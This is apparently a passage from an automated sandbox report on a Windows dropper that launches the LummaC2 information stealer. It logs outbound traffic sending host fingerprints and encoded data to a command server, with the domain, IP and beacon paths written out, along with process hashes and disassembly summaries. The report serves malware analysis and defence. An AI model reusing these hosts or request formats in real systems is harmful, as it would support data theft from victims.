70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED] Data Ascii: { "ip": "8.46.123.189", "current_time": "8428488241957460463", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 332 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 564 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 444 }, { "name": "svchost.exe", "pid": 732 }, { "name": "svchost.exe", "pid": 280 }, { "name": "svchost.exe" [TRUNCATED]
Dec 27, 2024 08:40:45.026937962 CET	4944	OUT	Data Raw: 48 34 6c 2b 43 62 6e 34 61 5c 2f 45 50 78 74 38 50 72 75 5c 2f 67 31 53 35 38 46 2b 4b 4e 62 38 4d 7a 61 6c 62 52 53 51 51 58 37 36 50 71 45 39 69 62 79 4b 43 56 6e 6b 67 53 34 38 6b 53 69 46 33 6b 4d 57 37 79 5c 2f 4d 6b 32 37 32 5c 2f 52 66 42 Data Ascii: H4l+Cbn4a\/EPxt8Pru\/g1S58F+KNb8MzalbRSQQX76PqE9ibyKCVnkgS48kSiF3kMW7y\/Mk272\/RfB76U3gL4+5tnGR+EfiBh+L81yDAUs0zfB0sh4qyepg8BWxMcJTxEpcQ5HlNKqniZxpOFCpVqwck5wjF8x+b+K\/0a\/G3wPyzKs48UuBsRwplud46pluV4qrnXDWaxxWNpYeWKqUFDIs5zSrSaw8ZVFOvTpU5JNRnK
Dec 27, 2024 08:40:45.027034998 CET	4944	OUT	Data Raw: 57 30 63 73 6f 32 50 35 78 34 6f 2b 4e 33 37 53 4d 75 72 5c 2f 45 48 39 6f 4c 34 58 65 50 39 4f 31 37 34 43 57 4d 31 70 62 61 66 34 66 31 4c 77 39 43 55 30 2b 5c 2f 74 37 76 51 74 4e 6b 38 4d 36 68 6f 63 73 55 32 74 61 5a 65 77 57 6d 6f 6e 78 42 Data Ascii: W0cso2P5x4o+N37SMur\/EH9oL4XeP9O174CWM1pbaf4f1Lw9CU0+\/t7vQtNk8M6hocsU2taZewWmonxBf+ILfV7XTtTtJlZLq1vLm20ez\/AIA468P82zTxU43jluLwuT05ZrhatHHY2ri8Hg8dmed4bL8bhsqhicLh68HjcV9elUo0sSo0p+xneS5G4\/6qeF3iPw\/l\/gl4eVM4wlbO6tDIMdCtl2Do4LG4\/BZTw5jczy
Dec 27, 2024 08:40:45.027184010 CET	2472	OUT	Data Raw: 5c 2f 38 41 56 56 70 44 74 5c 2f 64 5c 2f 39 4d 76 4e 38 7a 6e 5c 2f 41 44 5c 2f 6e 70 53 4e 5c 2f 72 50 38 41 59 4d 58 2b 72 6a 7a 5c 2f 41 4a 37 64 36 44 53 6e 31 2b 58 36 6c 62 62 5c 2f 41 42 39 50 54 7a 4a 66 78 71 73 33 38 4c 35 6a 44 5c 2f Data Ascii: \/8AVVpDt\/d\/9MvN8zn\/AD\/npSN\/rP8AYMX+rjz\/AJ7d6DSn1+X6lbb\/AB9PTzJfxqs38L5jD\/63\/P8AP\/Jqyy7uB878RRSdfO+x+n4flTGj5f8Aj\/z+fX9KDo9p5fj\/AMArfPI0kKeY7\/8ALLyz+\/muP8\/55Aokbd9z999o\/e\/636f57UfZ3kZt+H8v+Wf1\/KmxtC3H33\/D\/Xnj\/Pb69KDsIy38bw
Dec 27, 2024 08:40:45.027235985 CET	7416	OUT	Data Raw: 59 35 50 38 41 6e 50 31 70 37 62 34 39 2b 37 39 35 2b 39 38 32 62 79 34 76 39 64 5c 2f 6e 36 64 38 2b 6c 48 74 66 4f 58 39 66 4d 36 44 39 35 70 4c 4f 47 51 66 4a 4e 73 66 5c 2f 41 4a 35 79 48 36 5c 2f 68 6e 5c 2f 50 46 55 5a 4e 50 6c 5c 2f 75 48 Data Ascii: Y5P8AnP1p7b49+795+982by4v9d\/n6d8+lHtfOX9fM6D95pLOGQfJNsf\/AJ5yH6\/hn\/PFUZNPl\/uHbzjgd\/cn+hNWP4\/+Bf1qysj\/AMD\/AOff\/wCvWJ\/kf7SpTtr96\/rT5H0p+yholh4q8R\/EP4d68jnR\/Hfw01rSboceZ5i3umpHJASVIntoLq8u4HRgY5oI3GCoZeg+Gth8e\/2R\/hP8a18R\/DXRPEmna
Dec 27, 2024 08:40:45.027373075 CET	4944	OUT	Data Raw: 4b 7a 4e 42 6d 37 79 39 37 68 42 76 38 30 66 75 5c 2f 38 41 6e 74 39 50 35 66 35 35 4e 72 79 66 4f 6e 6d 62 2b 5a 50 39 61 66 33 33 76 61 57 67 70 36 35 56 6b 52 48 33 76 5c 2f 72 66 4d 6b 6c 5c 2f 7a 7a 6a 4e 52 46 75 66 76 37 49 54 4c 2b 39 5c Data Ascii: KzNBm7y97hBv80fu\/8Ant9P5f55NryfOnmb+ZP9af33vaWgp65VkRH3v\/rfMkl\/zzjNRFufv7ITL+9\/54Zz\/np+Xpp7Pz\/D\/gnQfu7RWJ4k16z8MaHqWv6gcWWl25ubg7guIw6p94ggcuOcGu2+KekaN8K7j4iWkvxX+DfxDvfg18W\/DnwQ+NOk\/DfWviS+sfCf4heL9O8V6l4W03xTbfEv4TfDGy1TT9cTwN4rtLT
Dec 27, 2024 08:40:45.147030115 CET	4944	OUT	Data Raw: 78 42 34 42 38 4f 58 63 48 68 6e 77 72 5a 65 4e 74 47 31 7a 55 76 46 65 6a 61 56 72 33 68 2b 36 38 4f 4a 66 36 39 6f 6d 6f 61 74 70 6c 73 6c 78 50 38 41 6a 2b 47 38 47 76 6f 68 34 79 73 73 4e 68 75 4b 63 56 56 78 46 35 52 6c 52 58 45 4f 50 6a 55 Data Ascii: xB4B8OXcHhnwrZeNtG1zUvFejaVr3h+68OJf69omoatplslxP8Aj+G8Gvoh4yssNhuKcVVxF5RlRXEOPjUpVIYLC5jKjiIywEXhsR9TxuGqrD1\/Z15Oo6UabrU6tOH7\/jfHn6d2XUnWxnBuDo0lTw9aE\/8AVTLair4fF16uHw2Jwnsswn9cwtadGc6eKwntsPLD+zxftPqtWlWn\/QJ\/w\/XP\/RrI\/wDD4f8A4oK\/Ln9
Dec 27, 2024 08:40:45.147062063 CET	2472	OUT	Data Raw: 50 41 33 67 66 52 76 69 42 38 62 50 67 37 34 66 30 2b 2b 38 54 66 44 58 78 7a 2b 30 66 62 57 5c 2f 69 54 78 58 34 4e 2b 49 58 78 66 38 41 2b 4a 76 69 42 48 65 61 6e 6f 47 6d 36 6e 39 4f 79 52 70 4b 6a 52 79 6f 6b 6b 62 6a 44 70 49 6f 64 47 48 6f Data Ascii: PA3gfRviB8bPg74f0++8TfDXxz+0fbW\/iTxX4N+IXxf8A+JviBHeanoGm6n9OyRpKjRyokkbjDpIodGHoysCrD2IIrMfQdDkiEEmi6TJCDkQvp1m0QOSciNoSmcknOM5JPev588YfAXLvFzPOFs+xme47KcXwlhcZRy2nhqdOpQnXxWcZBnP1mupWqqdOpw\/Qw0J4erQqxwmMzClGopYiNSj\/G\/gN9JnNPA3IOJ+HcJwzlu
Dec 27, 2024 08:40:45.147161961 CET	2472	OUT	Data Raw: 62 2b 41 6e 78 66 38 41 68 78 34 76 30 4c 58 4c 79 57 34 30 66 78 46 34 6e 31 44 39 6d 6e 34 35 2b 48 5c 2f 68 7a 61 58 31 76 6f 33 77 76 76 38 41 78 78 34 74 2b 44 51 38 52 33 58 68 75 44 34 64 36 78 6f 66 77 36 38 48 36 66 34 6a 39 73 73 50 46 Data Ascii: b+Anxf8Ahx4v0LXLyW40fxF4n1D9mn45+H\/hzaX1vo3wvv8Axx4t+DQ8R3XhuD4d6xofw68H6f4j9ssPFfwJ+COl\/A3xjp\/xd+G\/xw+Hvw0+NnxD\/aa8deE\/gj4r1DwHrer\/ALQHw0+EM3hH9mX4E\/D74b\/F\/wCHulfH6fT\/ABh4q1Cy+I3xQ\/aF8RfswyfAfwzYaHpngYa\/rviKxuLHVvUpNP02Xd5um2Mm8Y
Dec 27, 2024 08:40:45.147243023 CET	4944	OUT	Data Raw: 56 5c 2f 33 30 38 5a 43 4e 58 45 31 49 51 78 4c 61 68 47 4e 42 52 6f 4c 34 73 31 66 78 62 38 4e 64 63 30 54 34 58 66 73 31 65 4d 37 5c 2f 57 5c 2f 44 66 67 48 78 70 2b 79 42 38 58 66 32 64 5c 2f 6a 42 38 51 74 41 38 45 65 4b 74 61 74 76 67 52 38 Data Ascii: V\/308ZCNXE1IQxLahGNBRoL4s1fxb8Ndc0T4Xfs1eM7\/W\/DfgHxp+yB8Xf2d\/jB8QtA8EeKtatvgR8Qbr\/AIKG67+158Jdd13w9b22lHx78PNRsvDfhC3+IkPgFvFWuaP4a8WX9\/4e0fXfGnhtPCN\/23h3WPhD8IfEfxd8J+E\/j3+yZbeJvid+wh4m+Efhb4o+LP2cfjb8bf2cLf4jzfHj4BeMdN8MfED4cfFH9kHx7
Dec 27, 2024 08:40:45.191728115 CET	27192	OUT	Data Raw: 39 4f 74 57 57 77 76 33 33 32 4a 4a 2b 39 69 38 76 5c 2f 41 46 5c 2f 74 67 2b 68 5c 2f 7a 6a 76 43 30 62 5c 2f 66 64 4e 36 57 5c 2f 77 44 7a 37 39 50 74 48 5c 2f 36 38 66 6c 57 5a 6f 56 76 39 62 76 66 66 5c 2f 72 50 2b 65 66 54 32 5c 2f 50 31 48 Data Ascii: 9OtWWwv332JJ+9i8v\/AF\/tg+h\/zjvC0b\/fdN6W\/wDz79PtH\/68flWZoVv9bvff\/rP+efT2\/P1HOBU0e\/59jyfvIvN5\/f8A6f8A6\/TpQ\/nH7if8svNx\/qf856fzo8x9r7E8l\/8ApnL0\/wAPr3+tbe\/\/AHfxNKfX5FaPfuf5Mp5vlCTzf3+e3b0xnvRH\/Fl5N\/8ArTH+X+OBwPSn\/J\/rtkbp5pl8z\/l
Dec 27, 2024 08:40:49.866419077 CET	157	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Fri, 27 Dec 2024 07:40:49 GMT Content-Type: text/html; charset=utf-8 Content-Length: 1 Connection: close Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49731	185.121.15.192	80	5880	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2024 08:40:50.139712095 CET	99	OUT	GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1 Host: home.fortth14ht.top Accept: /
Dec 27, 2024 08:40:51.596936941 CET	372	IN	HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Fri, 27 Dec 2024 07:40:51 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49737	185.121.15.192	80	5880	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2024 08:40:51.861974955 CET	172	OUT	POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1 Host: home.fortth14ht.top Accept: / Content-Type: application/json Content-Length: 31 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Dec 27, 2024 08:40:53.457509995 CET	372	IN	HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Fri, 27 Dec 2024 07:40:53 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	34.226.108.155	443	5880	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 07:40:32 UTC	52	OUT	GET /ip HTTP/1.1 Host: httpbin.org Accept: /
2024-12-27 07:40:32 UTC	224	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 07:40:32 GMT Content-Type: application/json Content-Length: 31 Connection: close Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
2024-12-27 07:40:32 UTC	31	IN	Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a Data Ascii: { "origin": "8.46.123.189"}

Target ID:	0
Start time:	02:40:26
Start date:	27/12/2024
Path:	C:\Users\user\Desktop\8wiUGtm9UM.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\8wiUGtm9UM.exe"
Imagebase:	0x530000
File size:	6'156'288 bytes
MD5 hash:	A99ADAD8A9F9F1D9DCCE30C42DD4BE3A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:40:28
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Local\Temp\LummaC2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\LummaC2.exe"
Imagebase:	0x6b0000
File size:	299'520 bytes
MD5 hash:	607000C61FCB5A41B8D511B5ED7625D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 37%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	02:40:29
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Local\Temp\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Set-up.exe"
Imagebase:	0x290000
File size:	6'851'208 bytes
MD5 hash:	2A99036C44C996CEDEB2042D389FE23C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 26%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Function 05570A08 Relevance: 1.4, Strings: 1, Instructions: 187COMMON

Download Yara Rule

Strings

8wq, xrefs: 05570C4F

Memory Dump Source

Source File: 00000000.00000002.2178739541.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5570000_8wiUGtm9UM.jbxd

Similarity

API ID:
String ID: 8wq
API String ID: 0-1015343481
Opcode ID: 1bf35c7360f4121e4aca7dcfadd61604c16bde8a758bf5abb4636fa6606d4265
Instruction ID: 5ea9bfb5db935ab09885bd14ec9f131063a36c3c0f357dbc96de3e00f631f35e
Opcode Fuzzy Hash: 1bf35c7360f4121e4aca7dcfadd61604c16bde8a758bf5abb4636fa6606d4265
Instruction Fuzzy Hash: 6D6189346042059FCB14EB78E09DB29BFE6BB84310F59846AE50ADB2A1DF70EC45CB95

Function 05570590 Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2178739541.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5570000_8wiUGtm9UM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d004f0a288b66a4a81ac71e1743018f00ba872d608668eef7c653fe7427465b
Instruction ID: 7e4686f4b0561b66d36ff40dd17ca0db30870e82cdcee5eff57e48d5183e909b
Opcode Fuzzy Hash: 5d004f0a288b66a4a81ac71e1743018f00ba872d608668eef7c653fe7427465b
Instruction Fuzzy Hash: 97517C74A0020ACFCF09DBB4E59469EBBB2FF89304F50856AD510AB351DB316A55CB91

Function 05570848 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2178739541.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5570000_8wiUGtm9UM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49050104e7308a5a4b3562a2213b9609f8af574fb61ccac6715842fb0e9789a7
Instruction ID: b42ee0540ff8d9461ee9f22bcd6b02d953b7fa875c41e1e80e5671bbe242c0f1
Opcode Fuzzy Hash: 49050104e7308a5a4b3562a2213b9609f8af574fb61ccac6715842fb0e9789a7
Instruction Fuzzy Hash: 23416E74A0030ACFCF09DFB4E594A9EBBB2FF89304F509569D510A7350EB316A55CB91

Function 05570C90 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2178739541.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5570000_8wiUGtm9UM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 284a8103a3c3b1e9d6a048e24d0e6b1cd2eab963ef4c91d90bec0f014b0298dd
Instruction ID: 78466098eb0103b53e0f3f6a83be818f2a7f1d23b60cb63236e840ccb4216af5
Opcode Fuzzy Hash: 284a8103a3c3b1e9d6a048e24d0e6b1cd2eab963ef4c91d90bec0f014b0298dd
Instruction Fuzzy Hash: 5B3148757002195BCB00D7ADE948A6EBBE6FB84310F044525D41DD3392CB30E9468BD1

Analysis Process: LummaC2.exePID: 3620, Parent PID: 528COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	60%
Total number of Nodes:	40
Total number of Limit Nodes:	2

Executed Functions

Function 006E5135 Relevance: 65.4, Strings: 52, Instructions: 388
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\, xrefs: 006E5497
D, xrefs: 006E545F
4, xrefs: 006E56DA
", xrefs: 006E51F0
H, xrefs: 006E5156
:, xrefs: 006E51B8
2, xrefs: 006E5180
v, xrefs: 006E53A9
], xrefs: 006E5347
E, xrefs: 006E56F4
h, xrefs: 006E5489
C, xrefs: 006E540B
, xrefs: 006E54DD
<, xrefs: 006E51AA
(, xrefs: 006E5236
J, xrefs: 006E53EF
>, xrefs: 006E519C
r, xrefs: 006E53E1
F, xrefs: 006E53D3
{, xrefs: 006E539B
k, xrefs: 006E532B
G, xrefs: 006E53FD
., xrefs: 006E520C
^, xrefs: 006E54A5
f, xrefs: 006E54C1
V, xrefs: 006E5363
0, xrefs: 006E518E
f, xrefs: 006E54CF
i, xrefs: 006E5371
w, xrefs: 006E5443
M, xrefs: 006E53C5
6, xrefs: 006E5164
x, xrefs: 006E5419
*, xrefs: 006E5228
&, xrefs: 006E51D4
M, xrefs: 006E5435
,, xrefs: 006E521A
R, xrefs: 006E547B
t, xrefs: 006E5451
, xrefs: 006E51FE
$, xrefs: 006E51E2
3, xrefs: 006E5427
8, xrefs: 006E51C6
J, xrefs: 006E5148
l, xrefs: 006E5355
F, xrefs: 006E56F8
W, xrefs: 006E537F
n, xrefs: 006E54B3
9, xrefs: 006E546D
4, xrefs: 006E5172
(, xrefs: 006E55F0
*, xrefs: 006E55E8

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: $ $"$$$&$($($*$*$,$.$0$2$3$4$4$6$8$9$:$<$>$C$D$E$F$F$G$H$J$J$M$M$R$V$W$\$]$^$f$f$h$i$k$l$n$r$t$v$w$x${
API String ID: 0-1337114936
Opcode ID: 132f688d748ce8ff25820b0f9ab465d6531a5c17c56134ddeeef48c321da07fc
Instruction ID: b1d442a6a7df8de99816e70df168767003dbaeb0bbde94c65d5e1a788696cad2
Opcode Fuzzy Hash: 132f688d748ce8ff25820b0f9ab465d6531a5c17c56134ddeeef48c321da07fc
Instruction Fuzzy Hash: 252251219087E989DB32C67C8C187CDBEA15B27324F0843D9D1E96B3D2D7750B86CB66

Function 006B8720 Relevance: 7.7, APIs: 5, Instructions: 235
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 006B8744
GetCurrentThreadId.KERNEL32 ref: 006B874E
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 006B8808
GetForegroundWindow.USER32 ref: 006B89A1
ExitProcess.KERNEL32 ref: 006B8A17

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 2c24bca21b56b6d3c95f41c1d7a6f9e29a7989c4b4c77312b8c0fa129a16c226
Instruction ID: 5a528131b6996c80b5086d153a42fdc5ff33c439376e3ce16a584fc2b6fa3668
Opcode Fuzzy Hash: 2c24bca21b56b6d3c95f41c1d7a6f9e29a7989c4b4c77312b8c0fa129a16c226
Instruction Fuzzy Hash: B57125B3E443144FD318AE699C423AAB6DB9BC1710F1F813EA994EB395ED758C028395

Function 006EBAD0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(006EEA7B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 006EBAFE

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 006EC59C Relevance: 1.3, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

9., xrefs: 006EC5F0

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: 9.
API String ID: 2994545307-3220845746
Opcode ID: 15c0ad8bc0eeeea2814d4b9697d314575b78c861f7b2a01838d0c8af8ce9593b
Instruction ID: 9598064e6c7029afb72be64fba54b3ba7d3da6935047e32ff2ceecbb1931a4e7
Opcode Fuzzy Hash: 15c0ad8bc0eeeea2814d4b9697d314575b78c861f7b2a01838d0c8af8ce9593b
Instruction Fuzzy Hash: 3011C630A013504FEB148F19DC647BB77E3FB55334F28A628D861A73A1D720A801CB40

Function 006EEEC0 Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ea64189af9751a2a86d8de52a889f384e28a2f68256a4c848ccf5b4abdec3696
Instruction ID: 046718fb6c9552492779344a1795e1dc05029196b1a5cc553b3fcaad656c7429
Opcode Fuzzy Hash: ea64189af9751a2a86d8de52a889f384e28a2f68256a4c848ccf5b4abdec3696
Instruction Fuzzy Hash: 2E414871306384AFE7248B2ADCD1BBAB3A7EB88718F24452CE0C597295DA32BD11C641

